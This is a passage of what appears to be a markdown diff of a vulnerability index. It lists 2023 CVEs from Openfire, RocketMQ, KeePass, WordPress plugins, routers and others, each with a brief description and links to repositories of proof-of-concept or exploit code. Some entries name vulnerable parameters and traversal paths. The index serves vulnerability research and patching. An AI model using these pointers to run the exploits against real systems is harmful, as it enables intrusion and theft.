+Wondershare Filmora 12 (Build 12.2.1.2088) was discovered to contain an unquoted service path vulnerability via the component NativePushService. This vulnerability allows attackers to launch processes with elevated privileges. + + +- [msd0pe-1/CVE-2023-31747](https://github.com/msd0pe-1/CVE-2023-31747) + +### CVE-2023-31753 (2023-07-20) + +SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter. + + +- [khmk2k/CVE-2023-31753](https://github.com/khmk2k/CVE-2023-31753) + +### CVE-2023-31756 (2023-05-19) + +A command injection vulnerability exists in the administrative web portal in TP-Link Archer VR1600V devices running firmware Versions <= 0.1.0. 0.9.1 v5006.0 Build 220518 Rel.32480n which allows remote attackers, authenticated to the administrative web portal as an administrator user to open an operating system level shell via the 'X_TP_IfName' parameter. + + +- [StanleyJobsonAU/LongBow](https://github.com/StanleyJobsonAU/LongBow) + +### CVE-2023-31779 (2023-05-22) + +Wekan v6.84 and earlier is vulnerable to Cross Site Scripting (XSS). An attacker with user privilege on kanban board can insert JavaScript code in in "Reaction to comment" feature. + + +- [jet-pentest/CVE-2023-31779](https://github.com/jet-pentest/CVE-2023-31779) + +### CVE-2023-31851 (2023-07-17) + +Cudy LT400 1.13.4 is has a cross-site scripting (XSS) vulnerability in /cgi-bin/luci/admin/network/wireless/status via the iface parameter. + + +- [CalfCrusher/CVE-2023-31851](https://github.com/CalfCrusher/CVE-2023-31851) + +### CVE-2023-31852 (2023-07-17) + +Cudy LT400 1.13.4 is vulnerable to Cross Site Scripting (XSS) in cgi-bin/luci/admin/network/wireless/config via the iface parameter. + + +- [CalfCrusher/CVE-2023-31852](https://github.com/CalfCrusher/CVE-2023-31852) + +### CVE-2023-31853 (2023-07-17) + +Cudy LT400 1.13.4 is vulnerable Cross Site Scripting (XSS) in /cgi-bin/luci/admin/network/bandwidth via the icon parameter. + + +- [CalfCrusher/CVE-2023-31853](https://github.com/CalfCrusher/CVE-2023-31853) + +### CVE-2023-32031 (2023-06-14) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [Avento/CVE-2023-32031](https://github.com/Avento/CVE-2023-32031) + +### CVE-2023-32073 (2023-05-12) + +WWBN AVideo is an open source video platform. In versions 12.4 and prior, a command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854, which affects WWBN AVideo up to version 12.3. This issue is patched in commit 1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3. + + +- [jmrcsnchz/CVE-2023-32073](https://github.com/jmrcsnchz/CVE-2023-32073) + +### CVE-2023-32117 +- [RandomRobbieBF/CVE-2023-32117](https://github.com/RandomRobbieBF/CVE-2023-32117) + +### CVE-2023-32162 (2023-09-06) + +Wacom Drivers for Windows Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Drivers for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the WacomInstallI.txt file by the PrefUtil.exe utility. The issue results from incorrect permissions on the WacomInstallI.txt file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-16318. + + +- [LucaBarile/ZDI-CAN-16318](https://github.com/LucaBarile/ZDI-CAN-16318) + +### CVE-2023-32163 (2023-09-06) + +Wacom Drivers for Windows Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Drivers for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Tablet Service. By creating a symbolic link, an attacker can abuse the service to create a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-16857. + + +- [LucaBarile/ZDI-CAN-16857](https://github.com/LucaBarile/ZDI-CAN-16857) + +### CVE-2023-32233 (2023-05-08) + +In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled. + + +- [PIDAN-HEIDASHUAI/CVE-2023-32233](https://github.com/PIDAN-HEIDASHUAI/CVE-2023-32233) +- [Liuk3r/CVE-2023-32233](https://github.com/Liuk3r/CVE-2023-32233) +- [oferchen/POC-CVE-2023-32233](https://github.com/oferchen/POC-CVE-2023-32233) +- [RogelioPumajulca/TEST-CVE-2023-32233](https://github.com/RogelioPumajulca/TEST-CVE-2023-32233) +- [void0red/CVE-2023-32233](https://github.com/void0red/CVE-2023-32233) + +### CVE-2023-32235 (2023-05-05) + +Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js. + + +- [AXRoux/Ghost-Path-Traversal-CVE-2023-32235-](https://github.com/AXRoux/Ghost-Path-Traversal-CVE-2023-32235-) + +### CVE-2023-32243 (2023-05-12) + +Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. + + +- [little44n1o/cve-2023-32243](https://github.com/little44n1o/cve-2023-32243) +- [gbrsh/CVE-2023-32243](https://github.com/gbrsh/CVE-2023-32243) +- [RandomRobbieBF/CVE-2023-32243](https://github.com/RandomRobbieBF/CVE-2023-32243) +- [manavvedawala2/CVE-2023-32243-POC](https://github.com/manavvedawala2/CVE-2023-32243-POC) +- [manavvedawala2/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala2/CVE-2023-32243-proof-of-concept) +- [YouGina/CVE-2023-32243](https://github.com/YouGina/CVE-2023-32243) +- [thatonesecguy/Wordpress-Vulnerability-Identification-Scripts](https://github.com/thatonesecguy/Wordpress-Vulnerability-Identification-Scripts) +- [manavvedawala/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala/CVE-2023-32243-proof-of-concept) +- [Jenderal92/WP-CVE-2023-32243](https://github.com/Jenderal92/WP-CVE-2023-32243) +- [shaoyu521/Mass-CVE-2023-32243](https://github.com/shaoyu521/Mass-CVE-2023-32243) + +### CVE-2023-32314 (2023-05-15) + +vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [AdarkSt/Honeypot_Smart_Infrastructure](https://github.com/AdarkSt/Honeypot_Smart_Infrastructure) + +### CVE-2023-32315 (2023-05-26) + +Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice. + + +- [ohnonoyesyes/CVE-2023-32315](https://github.com/ohnonoyesyes/CVE-2023-32315) +- [tangxiaofeng7/CVE-2023-32315-Openfire-Bypass](https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass) +- [5rGJ5aCh5oCq5YW9/CVE-2023-32315exp](https://github.com/5rGJ5aCh5oCq5YW9/CVE-2023-32315exp) +- [miko550/CVE-2023-32315](https://github.com/miko550/CVE-2023-32315) +- [ThatNotEasy/CVE-2023-32315](https://github.com/ThatNotEasy/CVE-2023-32315) +- [izzz0/CVE-2023-32315-POC](https://github.com/izzz0/CVE-2023-32315-POC) +- [gibran-abdillah/CVE-2023-32315](https://github.com/gibran-abdillah/CVE-2023-32315) +- [CN016/Openfire-RCE-CVE-2023-32315-](https://github.com/CN016/Openfire-RCE-CVE-2023-32315-) +- [K3ysTr0K3R/CVE-2023-32315-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT) +- [bryanqb07/CVE-2023-32315](https://github.com/bryanqb07/CVE-2023-32315) + +### CVE-2023-32353 (2023-06-23) + +A logic issue was addressed with improved checks. This issue is fixed in iTunes 12.12.9 for Windows. An app may be able to elevate privileges. + + +- [86x/CVE-2023-32353-PoC](https://github.com/86x/CVE-2023-32353-PoC) + +### CVE-2023-32364 (2023-07-27) + +A logic issue was addressed with improved restrictions. This issue is fixed in macOS Ventura 13.5. A sandboxed process may be able to circumvent sandbox restrictions. + + +- [gergelykalman/CVE-2023-32364-macos-app-sandbox-escape](https://github.com/gergelykalman/CVE-2023-32364-macos-app-sandbox-escape) + +### CVE-2023-32407 (2023-06-23) + +A logic issue was addressed with improved state management. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to bypass Privacy preferences. + + +- [gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal](https://github.com/gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal) + +### CVE-2023-32413 (2023-06-23) + +A race condition was addressed with improved state handling. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to gain root privileges. + + +- [synacktiv/CVE-2023-32413](https://github.com/synacktiv/CVE-2023-32413) + +### CVE-2023-32422 (2023-06-23) + +This issue was addressed by adding additional SQLite logging restrictions. This issue is fixed in iOS 16.5 and iPadOS 16.5, tvOS 16.5, macOS Ventura 13.4. An app may be able to bypass Privacy preferences. + + +- [gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite](https://github.com/gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite) + +### CVE-2023-32428 (2023-09-06) + +This issue was addressed with improved file handling. This issue is fixed in macOS Ventura 13.4, tvOS 16.5, iOS 16.5 and iPadOS 16.5, watchOS 9.5. An app may be able to gain root privileges. + + +- [gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging](https://github.com/gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging) + +### CVE-2023-32560 (2023-08-10) + +An attacker can send a specially crafted message to the Wavelink Avalanche Manager, which could result in service disruption or arbitrary code execution.\n\nThanks to a Researcher at Tenable for finding and reporting.\n\nFixed in version 6.4.1. + + +- [x0rb3l/CVE-2023-32560](https://github.com/x0rb3l/CVE-2023-32560) +- [idkwastaken/CVE-2023-32560](https://github.com/idkwastaken/CVE-2023-32560) + +### CVE-2023-32571 (2023-06-22) + +Dynamic Linq 1.0.7.10 through 1.2.25 before 1.3.0 allows attackers to execute arbitrary code and commands when untrusted input to methods including Where, Select, OrderBy is parsed. + + +- [Tris0n/CVE-2023-32571-POC](https://github.com/Tris0n/CVE-2023-32571-POC) +- [vert16x/CVE-2023-32571-POC](https://github.com/vert16x/CVE-2023-32571-POC) + +### CVE-2023-32629 (2023-07-26) + +Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels + + +- [kaotickj/Check-for-CVE-2023-32629-GameOver-lay](https://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay) +- [ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation](https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation) +- [k4but0/Ubuntu-LPE](https://github.com/k4but0/Ubuntu-LPE) +- [xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC](https://github.com/xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC) + +### CVE-2023-32681 (2023-05-26) + +Requests is a HTTP library. Since Requests 2.3.0, Requests has been leaking Proxy-Authorization headers to destination servers when redirected to an HTTPS endpoint. This is a product of how we use `rebuild_proxies` to reattach the `Proxy-Authorization` header to requests. For HTTP connections sent through the tunnel, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into the tunneled request. This results in Requests forwarding proxy credentials to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate sensitive information. This issue has been patched in version 2.31.0.\n\n + + +- [hardikmodha/POC-CVE-2023-32681](https://github.com/hardikmodha/POC-CVE-2023-32681) + +### CVE-2023-32707 (2023-06-01) + +In versions of Splunk Enterprise below 9.0.5, 8.2.11, and 8.1.14, and Splunk Cloud Platform below version 9.0.2303.100, a low-privileged user who holds a role that has the ‘edit_user’ capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests. + + +- [9xN/CVE-2023-32707](https://github.com/9xN/CVE-2023-32707) + +### CVE-2023-32749 (2023-06-08) + +Pydio Cells allows users by default to create so-called external users in order to share files with them. By modifying the HTTP request sent when creating such an external user, it is possible to assign the new user arbitrary roles. By assigning all roles to a newly created user, access to all cells and non-personal workspaces is granted. + + +- [xcr-19/CVE-2023-32749](https://github.com/xcr-19/CVE-2023-32749) + +### CVE-2023-32784 (2023-05-15) + +In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation. + + +- [vdohney/keepass-password-dumper](https://github.com/vdohney/keepass-password-dumper) +- [CTM1/CVE-2023-32784-keepass-linux](https://github.com/CTM1/CVE-2023-32784-keepass-linux) +- [und3sc0n0c1d0/BruteForce-to-KeePass](https://github.com/und3sc0n0c1d0/BruteForce-to-KeePass) +- [z-jxy/keepass_dump](https://github.com/z-jxy/keepass_dump) +- [LeDocteurDesBits/cve-2023-32784](https://github.com/LeDocteurDesBits/cve-2023-32784) +- [hau-zy/KeePass-dump-py](https://github.com/hau-zy/KeePass-dump-py) +- [dawnl3ss/CVE-2023-32784](https://github.com/dawnl3ss/CVE-2023-32784) +- [le01s/poc-CVE-2023-32784](https://github.com/le01s/poc-CVE-2023-32784) +- [mister-turtle/cve-2023-32784](https://github.com/mister-turtle/cve-2023-32784) +- [Cmadhushanka/CVE-2023-32784-Exploitation](https://github.com/Cmadhushanka/CVE-2023-32784-Exploitation) +- [SarahZimmermann-Schmutzler/exploit_keepass](https://github.com/SarahZimmermann-Schmutzler/exploit_keepass) + +### CVE-2023-32961 (2023-06-12) + +Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Katie Seaborn Zotpress plugin <= 7.3.3 versions. + + +- [LOURC0D3/CVE-2023-32961](https://github.com/LOURC0D3/CVE-2023-32961) + +### CVE-2023-33105 (2024-03-04) + +Transient DOS in WLAN Host and Firmware when large number of open authentication frames are sent with an invalid transaction sequence number. + + +- [D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware](https://github.com/D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware) + +### CVE-2023-33242 (2023-08-09) + +Crypto wallets implementing the Lindell17 TSS protocol might allow an attacker to extract the full ECDSA private key by exfiltrating a single bit in every signature attempt (256 in total) because of not adhering to the paper's security proof's assumption regarding handling aborts after a failed signature. + + +- [d0rb/CVE-2023-33242](https://github.com/d0rb/CVE-2023-33242) + +### CVE-2023-33243 (2023-06-15) + +RedTeam Pentesting discovered that the web interface of STARFACE as well as its REST API allows authentication using the SHA512 hash of the password instead of the cleartext password. While storing password hashes instead of cleartext passwords in an application's database generally has become best practice to protect users' passwords in case of a database compromise, this is rendered ineffective when allowing to authenticate using the password hash. + + +- [RedTeamPentesting/CVE-2023-33243](https://github.com/RedTeamPentesting/CVE-2023-33243) + +### CVE-2023-33246 (2023-05-24) + +For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. \n\nSeveral components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. \n\nTo prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n\n\n\n\n\n\n\n\n\n\n\n + + +- [I5N0rth/CVE-2023-33246](https://github.com/I5N0rth/CVE-2023-33246) +- [4mazing/CVE-2023-33246-Copy](https://github.com/4mazing/CVE-2023-33246-Copy) +- [Le1a/CVE-2023-33246](https://github.com/Le1a/CVE-2023-33246) +- [SuperZero/CVE-2023-33246](https://github.com/SuperZero/CVE-2023-33246) +- [Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT) +- [3yujw7njai/CVE-2023-33246](https://github.com/3yujw7njai/CVE-2023-33246) +- [Devil0ll/CVE-2023-33246](https://github.com/Devil0ll/CVE-2023-33246) +- [d0rb/CVE-2023-33246](https://github.com/d0rb/CVE-2023-33246) +- [vulncheck-oss/fetch-broker-conf](https://github.com/vulncheck-oss/fetch-broker-conf) +- [0xKayala/CVE-2023-33246](https://github.com/0xKayala/CVE-2023-33246) +- [MkJos/CVE-2023-33246_RocketMQ_RCE_EXP](https://github.com/MkJos/CVE-2023-33246_RocketMQ_RCE_EXP) +- [hanch7274/CVE-2023-33246](https://github.com/hanch7274/CVE-2023-33246) +- [Sumitpathania03/Apache-RocketMQ-CVE-2023-33246-](https://github.com/Sumitpathania03/Apache-RocketMQ-CVE-2023-33246-) +- [PavilionQ/CVE-2023-33246-mitigation](https://github.com/PavilionQ/CVE-2023-33246-mitigation) + +### CVE-2023-33253 (2023-06-12) + +LabCollector 6.0 though 6.15 allows remote code execution. An authenticated remote low-privileged user can upload an executable PHP file and execute system commands. The vulnerability is in the message function, and is due to insufficient validation of the file (such as shell.jpg.php.shell) being sent. + + +- [Toxich4/CVE-2023-33253](https://github.com/Toxich4/CVE-2023-33253) + +### CVE-2023-33264 (2023-05-22) + +In Hazelcast through 5.0.4, 5.1 through 5.1.6, and 5.2 through 5.2.3, configuration routines don't mask passwords in the member configuration properly. This allows Hazelcast Management Center users to view some of the secrets. + + +- [miguelc49/CVE-2023-33264-2](https://github.com/miguelc49/CVE-2023-33264-2) +- [miguelc49/CVE-2023-33264-1](https://github.com/miguelc49/CVE-2023-33264-1) +- [miguelc49/CVE-2023-33264-3](https://github.com/miguelc49/CVE-2023-33264-3) + +### CVE-2023-33381 (2023-06-06) + +A command injection vulnerability was found in the ping functionality of the MitraStar GPT-2741GNAC router (firmware version AR_g5.8_110WVN0b7_2). The vulnerability allows an authenticated user to execute arbitrary OS commands by sending specially crafted input to the router via the ping function. + + +- [duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC](https://github.com/duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC) + +### CVE-2023-33404 (2023-06-26) + +An Unrestricted Upload vulnerability, due to insufficient validation on UploadControlled.cs file, in BlogEngine.Net version 3.3.8.0 and earlier allows remote attackers to execute remote code. + + +- [hacip/CVE-2023-33404](https://github.com/hacip/CVE-2023-33404) + +### CVE-2023-33405 (2023-06-21) + +Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect. + + +- [hacip/CVE-2023-33405](https://github.com/hacip/CVE-2023-33405) + +### CVE-2023-33408 (2023-06-05) + +Minical 1.0.0 is vulnerable to Cross Site Scripting (XSS). The vulnerability exists due to insufficient input validation in the application's user input handling in the security_helper.php file. + + +- [Thirukrishnan/CVE-2023-33408](https://github.com/Thirukrishnan/CVE-2023-33408) + +### CVE-2023-33409 (2023-06-05) + +Minical 1.0.0 is vulnerable to Cross Site Request Forgery (CSRF) via minical/public/application/controllers/settings/company.php. + + +- [Thirukrishnan/CVE-2023-33409](https://github.com/Thirukrishnan/CVE-2023-33409) + +### CVE-2023-33410 (2023-06-05) + +Minical 1.0.0 and earlier contains a CSV injection vulnerability which allows an attacker to execute remote code. The vulnerability exists due to insufficient input validation on the Customer Name field in the Accounting module that is used to construct a CSV file. + + +- [Thirukrishnan/CVE-2023-33410](https://github.com/Thirukrishnan/CVE-2023-33410) + +### CVE-2023-33476 (2023-06-02) + +ReadyMedia (MiniDLNA) versions from 1.1.15 up to 1.3.2 is vulnerable to Buffer Overflow. The vulnerability is caused by incorrect validation logic when handling HTTP requests using chunked transport encoding. This results in other code later using attacker-controlled chunk values that exceed the length of the allocated buffer, resulting in out-of-bounds read/write. + + +- [mellow-hype/cve-2023-33476](https://github.com/mellow-hype/cve-2023-33476) + +### CVE-2023-33477 (2023-06-06) + +In Harmonic NSG 9000-6G devices, an authenticated remote user can obtain source code by directly requesting a special path. + + +- [Skr11lex/CVE-2023-33477](https://github.com/Skr11lex/CVE-2023-33477) + +### CVE-2023-33517 (2023-10-23) + +carRental 1.0 is vulnerable to Incorrect Access Control (Arbitrary File Read on the Back-end System). + + +- [wushigudan/CVE-2023-33517](https://github.com/wushigudan/CVE-2023-33517) + +### CVE-2023-33580 (2023-06-26) + +Phpgurukul Student Study Center Management System V1.0 is vulnerable to Cross Site Scripting (XSS) in the "Admin Name" field on Admin Profile page. + + +- [sudovivek/My-CVE](https://github.com/sudovivek/My-CVE) + +### CVE-2023-33592 (2023-06-28) + +Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information. + + +- [ChineseOldboy/CVE-2023-33592](https://github.com/ChineseOldboy/CVE-2023-33592) + +### CVE-2023-33617 (2023-05-23) + +An OS Command Injection vulnerability in Parks Fiberlink 210 firmware version V2.1.14_X000 was found via the /boaform/admin/formPing target_addr parameter. + + +- [Chocapikk/CVE-2023-33617](https://github.com/Chocapikk/CVE-2023-33617) +- [tucommenceapousser/CVE-2023-33617](https://github.com/tucommenceapousser/CVE-2023-33617) + +### CVE-2023-33668 (2023-07-12) + +DigiExam up to v14.0.2 lacks integrity checks for native modules, allowing attackers to access PII and takeover accounts on shared computers. + + +- [lodi-g/CVE-2023-33668](https://github.com/lodi-g/CVE-2023-33668) + +### CVE-2023-33669 (2023-06-02) + +Tenda AC8V4.0-V16.03.34.06 was discovered to contain a stack overflow via the timeZone parameter in the sub_44db3c function. + + +- [retr0reg/tenda-ac8v4-rop](https://github.com/retr0reg/tenda-ac8v4-rop) +- [Mohammaddvd/CVE-2023-33669](https://github.com/Mohammaddvd/CVE-2023-33669) + +### CVE-2023-33730 (2023-05-31) + +Privilege Escalation in the "GetUserCurrentPwd" function in Microworld Technologies eScan Management Console 14.0.1400.2281 allows any remote attacker to retrieve password of any admin or normal user in plain text format. + + +- [sahiloj/CVE-2023-33730](https://github.com/sahiloj/CVE-2023-33730) + +### CVE-2023-33731 (2023-06-02) + +Reflected Cross Site Scripting (XSS) in the view dashboard detail feature in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the URL directly. + + +- [sahiloj/CVE-2023-33731](https://github.com/sahiloj/CVE-2023-33731) + +### CVE-2023-33732 (2023-05-31) + +Cross Site Scripting (XSS) in the New Policy form in Microworld Technologies eScan management console 14.0.1400.2281 allows a remote attacker to inject arbitrary code via the vulnerable parameters type, txtPolicyType, and Deletefileval. + + +- [sahiloj/CVE-2023-33732](https://github.com/sahiloj/CVE-2023-33732) + +### CVE-2023-33733 (2023-06-05) + +Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file. + + +- [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733) +- [hoangbui24/CVE-2023-33733](https://github.com/hoangbui24/CVE-2023-33733) +- [onion2203/Lab_Reportlab](https://github.com/onion2203/Lab_Reportlab) +- [buiduchoang24/CVE-2023-33733](https://github.com/buiduchoang24/CVE-2023-33733) +- [L41KAA/CVE-2023-33733-Exploit-PoC](https://github.com/L41KAA/CVE-2023-33733-Exploit-PoC) + +### CVE-2023-33747 (2023-06-06) + +CloudPanel v2.2.2 allows attackers to execute a path traversal. + + +- [0xWhoami35/CloudPanel-CVE-2023-33747](https://github.com/0xWhoami35/CloudPanel-CVE-2023-33747) + +### CVE-2023-33768 (2023-07-13) + +Incorrect signature verification of the firmware during the Device Firmware Update process of Belkin Wemo Smart Plug WSP080 v1.2 allows attackers to cause a Denial of Service (DoS) via a crafted firmware file. + + +- [purseclab/CVE-2023-33768](https://github.com/purseclab/CVE-2023-33768) +- [Fr0stM0urne/CVE-2023-33768](https://github.com/Fr0stM0urne/CVE-2023-33768) + +### CVE-2023-33781 (2023-06-07) + +An issue in D-Link DIR-842V2 v1.0.3 allows attackers to execute arbitrary commands via importing a crafted file. + + +- [s0tr/CVE-2023-33781](https://github.com/s0tr/CVE-2023-33781) + +### CVE-2023-33782 (2023-06-07) + +D-Link DIR-842V2 v1.0.3 was discovered to contain a command injection vulnerability via the iperf3 diagnostics function. + + +- [s0tr/CVE-2023-33782](https://github.com/s0tr/CVE-2023-33782) + +### CVE-2023-33802 (2023-07-26) + +A buffer overflow in SumatraPDF Reader v3.4.6 allows attackers to cause a Denial of Service (DoS) via a crafted text file. + + +- [CDACesec/CVE-2023-33802](https://github.com/CDACesec/CVE-2023-33802) + +### CVE-2023-33817 (2023-06-13) + +hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability. + + +- [leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5) + +### CVE-2023-33829 (2023-05-24) + +A stored cross-site scripting (XSS) vulnerability in Cloudogu GmbH SCM Manager v1.2 to v1.60 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description text field. + + +- [n3gox/CVE-2023-33829](https://github.com/n3gox/CVE-2023-33829) +- [3yujw7njai/CVE-2023-33829-POC](https://github.com/3yujw7njai/CVE-2023-33829-POC) + +### CVE-2023-33831 (2023-09-18) + +A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. + + +- [rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831](https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831) +- [btar1gan/exploit_CVE-2023-33831](https://github.com/btar1gan/exploit_CVE-2023-33831) + +### CVE-2023-33902 (2023-07-12) + +In bluetooth service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. + + +- [uthrasri/CVE-2023-33902_single_file](https://github.com/uthrasri/CVE-2023-33902_single_file) + +### CVE-2023-33977 (2023-06-06) + +Kiwi TCMS is an open source test management system for both manual and automated testing. Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced upload validators in order to prevent potentially dangerous files from being uploaded and Content-Security-Policy definition to prevent cross-site-scripting attacks. The upload validation checks were not 100% robust which left the possibility to circumvent them and upload a potentially dangerous file which allows execution of arbitrary JavaScript in the browser. Additionally we've discovered that Nginx's `proxy_pass` directive will strip some headers negating protections built into Kiwi TCMS when served behind a reverse proxy. This issue has been addressed in version 12.4. Users are advised to upgrade. Users unable to upgrade who are serving Kiwi TCMS behind a reverse proxy should make sure that additional header values are still passed to the client browser. If they aren't redefining them inside the proxy configuration. + + +- [mnqazi/CVE-2023-33977](https://github.com/mnqazi/CVE-2023-33977) + +### CVE-2023-34034 (2023-07-19) + +Using "**" as a pattern in Spring Security configuration \nfor WebFlux creates a mismatch in pattern matching between Spring \nSecurity and Spring WebFlux, and the potential for a security bypass.\n\n + + +- [hotblac/cve-2023-34034](https://github.com/hotblac/cve-2023-34034) + +### CVE-2023-34035 (2023-07-18) + +Spring Security versions 5.8 prior to 5.8.5, 6.0 prior to 6.0.5, and 6.1 prior to 6.1.2 could be susceptible to authorization rule misconfiguration if the application uses requestMatchers(String) and multiple servlets, one of them being Spring MVC’s DispatcherServlet. (DispatcherServlet is a Spring MVC component that maps HTTP endpoints to methods on @Controller-annotated classes.)\n\nSpecifically, an application is vulnerable when all of the following are true:\n\n * Spring MVC is on the classpath\n * Spring Security is securing more than one servlet in a single application (one of them being Spring MVC’s DispatcherServlet)\n * The application uses requestMatchers(String) to refer to endpoints that are not Spring MVC endpoints\n\n\nAn application is not vulnerable if any of the following is true:\n\n * The application does not have Spring MVC on the classpath\n * The application secures no servlets other than Spring MVC’s DispatcherServlet\n * The application uses requestMatchers(String) only for Spring MVC endpoints\n\n\n\n + + +- [mouadk/CVE-2023-34035-Poc](https://github.com/mouadk/CVE-2023-34035-Poc) +- [jzheaux/cve-2023-34035-mitigations](https://github.com/jzheaux/cve-2023-34035-mitigations) + +### CVE-2023-34039 (2023-08-29) + +Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI. + + +- [sinsinology/CVE-2023-34039](https://github.com/sinsinology/CVE-2023-34039) +- [CharonDefalt/CVE-2023-34039](https://github.com/CharonDefalt/CVE-2023-34039) +- [Cyb3rEnthusiast/CVE-2023-34039](https://github.com/Cyb3rEnthusiast/CVE-2023-34039) +- 